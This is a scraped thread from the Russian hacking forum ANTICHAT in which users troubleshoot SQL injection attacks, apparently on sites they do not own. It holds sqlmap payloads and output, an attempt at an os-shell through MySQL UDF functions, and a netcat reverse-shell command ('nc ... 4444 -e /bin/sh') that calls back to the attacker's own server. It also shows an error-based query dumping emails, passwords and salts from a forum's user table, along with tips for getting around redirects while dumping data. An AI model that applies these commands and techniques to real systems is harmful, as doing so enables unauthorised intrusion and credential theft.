ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
17.05.2017, 14:02
|
|
Новичок
Регистрация: 20.02.2016
Сообщений: 10
Провел на форуме:
2307
Репутация:
0
|
|
Сообщение от RWD
↑
типичный лимит запросов в минуту.
Подскажи выход?
|
|
|
17.05.2017, 14:04
|
|
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
Провел на форуме:
43449
Репутация:
1
|
|
|
|
|
|
18.05.2017, 14:42
|
|
Познающий
Регистрация: 02.04.2016
Сообщений: 40
Провел на форуме:
11491
Репутация:
4
|
|
Подскажите по такому вопросу. Нужно раскрыть названия директорий в списке, в частности найти админку.
Все способы перпробовал, вроде все закрыто. Но. При использовании SQLMAP можно получить путь к базе.
Код:
[13:12:11] [INFO] retrieving MySQL plugin directory absolute path
[13:12:11] [INFO] resumed: /us\x81/lib64/mysql/plugin
Сама уязвимость.
Код:
Parameter: id (GET)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (comment)
Payload: id=103;SELECT SLEEP(5)#&id=103
Если отрывается путь к базе, значит можно и просканировать все папки подумал я.
Начал использовать --os-shell.
UDF вроде как создается
Код:
creating UDF 'sys_eval'
creating UDF 'sys_exec'
И, также при завершении os-shell, программа спрашивает:
Код:
[13:40:08] [INFO] cleaning up the database management system
do you want to remove UDF 'sys_eval'? [Y/n]
НО команды в строке ничего не выводят, как только не делал
Код:
os-shell> namehost
do you want to retrieve the command standard output? [Y/n/a] y
[13:26:35] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
No output
Сообственно вопрос: если нашло путь к базе, хоть и долго мучало сервер, но нашло. Значит можно получить любые директории? Есть ли какие то мысли на этот счет? |
|
|
|
18.05.2017, 14:52
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме:
238786
Репутация:
40
|
|
Сообщение от spize0r
↑
Подскажите по такому вопросу. Нужно раскрыть названия директорий в списке, в частности найти админку.
Все способы перпробовал, вроде все закрыто. Но. При использовании SQLMAP можно получить путь к базе.
Код:
[13:12:11] [INFO] retrieving MySQL plugin directory absolute path
[13:12:11] [INFO] resumed: /us\x81/lib64/mysql/plugin
Сама уязвимость.
Код:
Parameter: id (GET)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (comment)
Payload: id=103;SELECT SLEEP(5)#&id=103
Если отрывается путь к базе, значит можно и просканировать все папки подумал я.
Начал использовать --os-shell.
UDF вроде как создается
Код:
creating UDF 'sys_eval'
creating UDF 'sys_exec'
И, также при завершении os-shell, программа спрашивает:
Код:
[13:40:08] [INFO] cleaning up the database management system
do you want to remove UDF 'sys_eval'? [Y/n]
НО
команды в строке ничего не выводят, как только не делал
Код:
os-shell> namehost
do you want to retrieve the command standard output? [Y/n/a] y
[13:26:35] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
No output
Сообственно вопрос: если нашло путь к базе, хоть и долго мучало сервер, но нашло. Значит можно получить любые директории? Есть ли какие то мысли на этот счет?
Это пути директории где по умолчанию находятся плагины. В ТОМ числе плагин, или как она ещё верно называется библиотека для мускул сервера что бы выполнить UDF. А значит , я смею предположить что ничего вы не нашли. Ну предположим, у вас слепое
выполнение команд. На целевом сервере делаем запрос nc ((195,1,1,1)ip вашего сервера) 4444 -e /bin/sh . У себя на выделенным сервере nc -lvp 4444. В случаи успеха будет шелл. Но, я очень сомневаюсь что у вас что-то получиться. Удачи.
|
|
|
|
18.05.2017, 15:04
|
|
Познающий
Регистрация: 02.04.2016
Сообщений: 40
Провел на форуме:
11491
Репутация:
4
|
|
Сообщение от BabaDook
↑
Это пути директории где по умолчанию находятся плагины. В ТОМ числе плагин, или как она ещё верно называется библиотека для мускул сервера что бы выполнить UDF. А значит , я смею предположить что ничего вы не нашли. Ну предположим, у вас слепое
выполнение команд. На целевом сервере делаем запрос nc ((195,1,1,1)ip вашего сервера) 4444 -e /bin/sh . У себя на выделенным сервере nc -lvp 4444. В случаи успеха будет шелл. Но, я очень сомневаюсь что у вас что-то получиться. Удачи.
Вопрос: почему нельзя искать любые директории если находит дир. библиотек, и почему нельзя записать шел на сервер, если пишет UDF ?
|
|
|
|
18.05.2017, 15:16
|
|
Познающий
Регистрация: 02.04.2016
Сообщений: 40
Провел на форуме:
11491
Репутация:
4
|
|
Сообщение от BabaDook
↑
Я чё та туплю. А что за команду вы пытайтесь выполнить 'namehost' - это вы откуда взяли ?. Если команды выполняются, то можно искать диры, файлы, итд
А какие команды можно выполнять в строке os-shell> ?
чтобы не получать:
No output
|
|
|
|
18.05.2017, 15:44
|
|
Познающий
Регистрация: 02.04.2016
Сообщений: 40
Провел на форуме:
11491
Репутация:
4
|
|
Блин ступлил, hostname и выполнял . Опечатался.
Ничего не выводит. И все же непонятен вопрос почему он может сканировать путь к плагинам, а к другим файлам нет.
Ведь если SQLMAP может найти этот путь, то и вывести список файлов по заданному пути в директории тоже есть вариант. Или нет?
|
|
|
|
18.05.2017, 15:59
|
|
Новичок
Регистрация: 21.01.2010
Сообщений: 0
Провел на форуме:
4776
Репутация:
0
|
|
Ребят подскажите
Есть обычный ерор
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
Колонки с малым кол-во записей дампятся и тд и тп
но в основной таблице с юзерами ,начинаю дамп , он пробует определить кол-во записей emai,password,salt и через секунд 10 идет редирект
[14:56:50] [INFO] testing MySQL
[14:56:50] [PAYLOAD] -2390
[14:56:50] [WARNING] reflective value(s) found and filtering out
[14:56:50] [DEBUG] resuming configuration option 'optimize' (True)
[14:56:50] [DEBUG] performed 0 queries in 0.00 seconds
[14:56:50] [INFO] confirming MySQL
[14:56:50] [DEBUG] performed 0 queries in 0.00 seconds
[14:56:50] [DEBUG] performed 0 queries in 0.00 seconds
[14:56:50] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[14:56:50] [PAYLOAD] -5914' OR 1 GROUP BY CONCAT(0x7178767a71,(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM vbforums.vb3_user),0x71786b7a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#
sqlmap got a 302 redirect to ' https://www.site.com:443/'. Do you want to follow? [Y/n] n
[14:57:04] [DEBUG] performed 1 queries in 13.98 seconds
[14:57:04] [ERROR] unable to retrieve the number of entries for any table |
|
|
|
18.05.2017, 16:27
|
|
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
Провел на форуме:
300820
Репутация:
90
|
|
оу, как лестно
попробуй крутить сразу по https и c www
попробуй дампить не все сразу, а частями, заюзав --where="id
|
|
|
|
18.05.2017, 16:33
|
|
Новичок
Регистрация: 21.01.2010
Сообщений: 0
Провел на форуме:
4776
Репутация:
0
|
|
[QUOTE="t0ma5"]
↑
оу, как лестно
попробуй крутить сразу по https и c www
попробуй дампить не все сразу, а частями, заюзав --where="id |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
